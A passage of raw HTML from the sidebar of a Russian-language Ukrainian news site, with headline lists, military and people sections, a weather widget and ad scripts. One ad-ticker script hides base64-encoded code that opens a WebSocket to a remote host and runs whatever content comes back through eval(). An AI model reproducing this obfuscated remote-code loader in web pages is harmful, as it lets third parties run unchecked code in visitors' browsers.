a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4758234" class="postafisha"><span class="region">Киев 06&#160;июня</span><div class="aimg"><a href="https://enovosty.com/kino/full/2905-kinopremera-film-lyudi-iks-temnyj-feniks"><img width="170" height="132" alt="Кинопремьера: фильм «Люди Икс: Темный ..." src="/wp-content/uploads/2019/05/dark_phoenix2.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2905-kinopremera-film-lyudi-iks-temnyj-feniks">Кинопремьера: фильм «Люди Икс: Темный ...</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4380261"><a href="https://enovosty.com/armiya/full/686-bronirovannaya-mashina-stryker" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/Stryker-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/Stryker-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/Stryker-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/Stryker.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/686-bronirovannaya-mashina-stryker" >Бронированная машина Stryker (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4395750"><a href="https://enovosty.com/armiya/full/742-broneavtomobil-dingo-atf-germaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/10/Dingo-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/Dingo-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/10/Dingo-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/Dingo.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/742-broneavtomobil-dingo-atf-germaniya" >Бронеавтомобиль Dingo ATF (Германия)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4455275"><a href="https://enovosty.com/armiya/full/684-protivokorabelnaya-raketa-type-80-asm-1-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/06/ASM-1-Type-80-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/06/ASM-1-Type-80-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/06/ASM-1-Type-80-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/06/ASM-1-Type-80.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/684-protivokorabelnaya-raketa-type-80-asm-1-yaponiya" >Противокорабельная ракета Type 80 ASM-1 (Япония)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4569803"><a href="https://enovosty.com/armiya/full/822-vintovka-stl-016-armata-killer" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/11/armata_kiler-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/11/armata_kiler-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/11/armata_kiler-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/11/armata_kiler.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/822-vintovka-stl-016-armata-killer" >Винтовка STL–016 «Армата-киллер»</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости общества</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '77095', 77095, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '77095', 77095, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '77095', 77095, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_society/full/506-mezhdunarodnyj-aeroport-borispol-mozhet-prekratit-rabotu-cherez-dve-nedeli">Международный аэропорт "Борисполь" может прекратить работу через две недели (5875)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/306-vselenskij-patriarx-varfolomej-zayavil-chto-patriarxat-kievskij-nikogda-ne-sushhestvoval">Вселенский Патриарх Варфоломей заявил, что «Патриархат Киевский» никогда не существовал (4141)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/406-vokrug-dela-zajcevoj-dronova-razgoraetsya-novyj-skandal">Вокруг дела Зайцевой-Дронова разгорается новый скандал (4009)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/3005-v-blizhajshie-dni-v-ukraine-budet-tropicheskaya-pogoda">В ближайшие дни в Украине будет "тропическая" погода (3940)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/506-opublikovan-rejting-luchshix-ukrainskix-vuzov-dlya-izucheniya-it">Опубликован рейтинг лучших украинских ВУЗов для изучения IT (3564)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/3005-nazvali-sekret-prochnyx-otnoshenij">Назвали секрет прочных отношений (2971)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/406-ukrainskim-voennym-budut-vyplachivat-motivacionnuyu-premiyu">Украинским военным будут выплачивать мотивационную премию (2632)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/306-v-ukraine-prognoziruyut-samoe-anomalnoe-leto-za-neskolko-desyatkov-let">В Украине прогнозируют самое аномальное лето за несколько десятков лет (2513)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/206-v-seti-opublikovali-video-polurazrushennogo-donbassa-s-vysoty-ptichego-poleta-video">В Сети опубликовали видео полуразрушенного Донбасса с высоты птичьего полета (ВИДЕО) (1921)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/3005-uchenye-nashli-v-severnom-more-zatonuvshuyu-stranu">Ученые нашли в Северном море затонувшую страну (1770)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4307300"><a href="https://enovosty.com/person/full/yaroslavskij-aleksandr" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/yaroslavskiy-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/yaroslavskiy-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/yaroslavskiy.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/yaroslavskij-aleksandr" >Александр<br /> ЯРОСЛАВСКИЙ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4308316"><a href="https://enovosty.com/person/full/farion-irina" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/farion_eidt-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/farion_eidt-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/farion_eidt.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/farion-irina" >Ирина<br /> ФАРИОН</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4312343"><a href="https://enovosty.com/person/full/mihelson-leonid" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/mihelson_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/mihelson_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/mihelson_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/mihelson-leonid" >Леонид<br /> МИХЕЛЬСОН</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4412272"><a href="https://enovosty.com/person/full/231-kvitashvili-aleksandr" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/12/kvitashvili-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/kvitashvili-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/kvitashvili.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/231-kvitashvili-aleksandr" >Александр<br /> КВИТАШВИЛИ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news-auto/full/506-v-ukrainu-budut-postavlyat-nedorogie-avto-iz-korei">В Украину будут поставлять недорогие авто из Кореи (6212)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/506-mezhdunarodnyj-aeroport-borispol-mozhet-prekratit-rabotu-cherez-dve-nedeli">Международный аэропорт "Борисполь" может прекратить работу через две недели (5894)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/506-donald-tramp-zadremal-vo-vremya-rechi-korolevy-elizavety-ii-video">Дональд Трамп задремал во время речи королевы Елизаветы II (ВИДЕО) (3626)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/506-opublikovan-rejting-luchshix-ukrainskix-vuzov-dlya-izucheniya-it">Опубликован рейтинг лучших украинских ВУЗов для изучения IT (3580)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/506-kogda-tv-v-ukraine-stanet-polnostyu-platnym">Когда ТВ в Украине станет полностью платным (3545)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/506-populyarnyj-napitok-okazalsya-smertelno-opasnym">Популярный напиток оказался смертельно опасным (3137)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/506-v-ukraine-byl-start-amerikanskij-professor-gde-vozgoritsya-plamya-vojny-mezhdu-rf-i-ssha">"В Украине был старт": Американский профессор рассказал, где "возгорится пламя" войны между РФ и США (2689)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/506-dva-cugcvanga-dlya-zelenskogo-mnenie">"Два цугцванга для Зеленского", - мнение (2610)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/506-kitajskij-bankopad-ekonomika-knr-na-grani-krizisa">"Китайский банкопад": Экономика КНР на грани кризиса (2584)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/506-eto-plan-pompeo-lavrova-i-novyj-alyans-utrennie-novosti-ponomarya">Это - план Помпео - Лаврова и новый альянс: Утренние новости Пономаря (2561)</a></p></div> </div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><br /></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1004-vesenne-letnij-otpusk-kakie-strany-vybirayut-ukraincy" title="Весенне-летний отпуск: Какие страны выбирают украинцы" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2019/04/egypt-460x305.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/04/egypt.jpg 460w, https://enovosty.com/wp-content/uploads/2019/04/egypt-112x74.jpg 112w, https://enovosty.com/wp-content/uploads/2019/04/egypt-300x199.jpg 300w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1004-vesenne-letnij-otpusk-kakie-strany-vybirayut-ukraincy" style="line-height: 1.1;" rel="bookmark" title="Весенне-летний отпуск: Какие страны выбирают украинцы">Весенне-летний отпуск: Какие страны выбирают украинцы</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1910-ot-poxishheniya-majkla-dzheksona-do-krupnogo-moshennichestva-udivitelnaya-istoriya-voskresshego-ukrainskogo-korrupcionera" title="От похищения Майкла Джексона до крупного мошенничества: удивительная история воскресшего украинского коррупционера" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/10/malinovskiy-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/10/malinovskiy.jpg 300w, https://enovosty.com/wp-content/uploads/2018/10/malinovskiy-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1910-ot-poxishheniya-majkla-dzheksona-do-krupnogo-moshennichestva-udivitelnaya-istoriya-voskresshego-ukrainskogo-korrupcionera" style="line-height: 1.1;" rel="bookmark" title="От похищения Майкла Джексона до крупного мошенничества: удивительная история воскресшего украинского коррупционера">От похищения Майкла Джексона до крупного мошенничества: удивительная история воскресшего украинского коррупционера</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/2406-okno-v-kitaj-bezvizovyj-xajnan" title="Окно в Китай: безвизовый Хайнань" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/06/hainan0-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/06/hainan0.jpg 300w, https://enovosty.com/wp-content/uploads/2018/06/hainan0-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/2406-okno-v-kitaj-bezvizovyj-xajnan" style="line-height: 1.1;" rel="bookmark" title="Окно в Китай: безвизовый Хайнань">Окно в Китай: безвизовый Хайнань</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/2105-dva-tuza-protiv-rossii-unikalnye-kadry-krymskogo-mosta-i-vazhnyj-shag-po-ukrepleniyu-nacionalnoj-bezopasnosti-luchshie-posty-blogosfery" title="«Два туза против России», уникальные кадры Крымского моста и важный шаг по укреплению национальной безопасности: Лучшие посты блогосферы" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/cover_300-300x200.png" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/cover_300.png 300w, https://enovosty.com/wp-content/uploads/2018/05/cover_300-112x75.png 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/2105-dva-tuza-protiv-rossii-unikalnye-kadry-krymskogo-mosta-i-vazhnyj-shag-po-ukrepleniyu-nacionalnoj-bezopasnosti-luchshie-posty-blogosfery" style="line-height: 1.1;" rel="bookmark" title="«Два туза против России», уникальные кадры Крымского моста и важный шаг по укреплению национальной безопасности: Лучшие посты блогосферы">«Два туза против России», уникальные кадры Крымского моста и важный шаг по укреплению национальной безопасности: Лучшие посты блогосферы</a></p></div><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1705-rejting-youtube-top-10-samyx-populyarnyx-video-voennoj-tematiki-za-aprel" title="Рейтинг YouTube: ТОП-10 самых популярных видео военной тематики за апрель" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/lodka-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/lodka.jpg 300w, https://enovosty.com/wp-content/uploads/2018/05/lodka-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1705-rejting-youtube-top-10-samyx-populyarnyx-video-voennoj-tematiki-za-aprel" style="line-height: 1.1;" rel="bookmark" title="Рейтинг YouTube: ТОП-10 самых популярных видео военной тематики за апрель">Рейтинг YouTube: ТОП-10 самых популярных видео военной тематики за апрель</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1505-rejting-youtube-top-10-luchshix-lajfxakov-mesyaca" title="Рейтинг YouTube на 15 мая: ТОП-10 лучших лайфхаков месяца" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/gorelka-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/gorelka.jpg 300w, https://enovosty.com/wp-content/uploads/2018/05/gorelka-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1505-rejting-youtube-top-10-luchshix-lajfxakov-mesyaca" style="line-height: 1.1;" rel="bookmark" title="Рейтинг YouTube на 15 мая: ТОП-10 лучших лайфхаков месяца">Рейтинг YouTube на 15 мая: ТОП-10 лучших лайфхаков месяца</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/1405-kartofelnaya-moneta-tresh-i-ugar-batki-i-sobaka-ministra-posylaka-luchshee-iz-blogosfery" title="Картофельная монета, треш и угар Батьки и «собака-министра посылака»: Лучшее из блогосферы" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/62050-1_large-1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/62050-1_large-1.jpg 300w, https://enovosty.com/wp-content/uploads/2018/05/62050-1_large-1-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/1405-kartofelnaya-moneta-tresh-i-ugar-batki-i-sobaka-ministra-posylaka-luchshee-iz-blogosfery" style="line-height: 1.1;" rel="bookmark" title="Картофельная монета, треш и угар Батьки и «собака-министра посылака»: Лучшее из блогосферы">Картофельная монета, треш и угар Батьки и «собака-министра посылака»: Лучшее из блогосферы</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/805-top-10-samyx-dorogix-yaxt-v-mire" title="ТОП-10 самых дорогих яхт в мире" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/yahty-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/yahty.jpg 300w, https://enovosty.com/wp-content/uploads/2018/05/yahty-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/805-top-10-samyx-dorogix-yaxt-v-mire" style="line-height: 1.1;" rel="bookmark" title="ТОП-10 самых дорогих яхт в мире">ТОП-10 самых дорогих яхт в мире</a></p></div><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/705-boevik-majnyashhij-bitkoiny-v-monastyre-mp-i-syrniki-s-xloridom-kalciya-ot-timoshenko-luchshie-posty-blogosfery" title="Боевик, майнящий биткоины в монастыре МП и сырники с хлоридом кальция от Тимошенко: Лучшие посты блогосферы" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2018/05/blogo_ed300-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/05/blogo_ed300.jpg 300w, https://enovosty.com/wp-content/uploads/2018/05/blogo_ed300-112x75.jpg 112w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/705-boevik-majnyashhij-bitkoiny-v-monastyre-mp-i-syrniki-s-xloridom-kalciya-ot-timoshenko-luchshie-posty-blogosfery" style="line-height: 1.1;" rel="bookmark" title="Боевик, майнящий биткоины в монастыре МП и сырники с хлоридом кальция от Тимошенко: Лучшие посты блогосферы">Боевик, майнящий биткоины в монастыре МП и сырники с хлоридом кальция от Тимошенко: Лучшие посты блогосферы</a></p></div><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36642" type="text/javascript">(function() {var worker36642,tickerID = 36642,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36642'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36642');script.setAttribute('data-idn', idn);script.src = '//virt0n.news/ru-n4p/0/36/ticker_36642.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36642.postMessage(data);}worker36642 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36642.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36642.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://enovosty.com/politika/full/2905-ze-protiv-pu-popytka-prognoza-i-voprosy-bez-otvetov "><img alt="Зе против Пу" src="https://enovosty.com/wp-content/themes/eizvestia/img/Ze_Pu.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script><br><div><a href="http://www.serdze.org.ua/need-help "><img alt="Нужна помощь" src="https://enovosty.com/wp-content/themes/eizvestia/img/New_svedenie1.gif"></a></div></br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><div id="lastafisha" class="slide" style="width:240px;margin:auto;"><script>jQuery(document).ready(function($){function region(){html = $('#lastafisha .anythingWindow .activePage .region').html();$('#lastafisha .head span').html(html);}$('#sliderafisha').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, 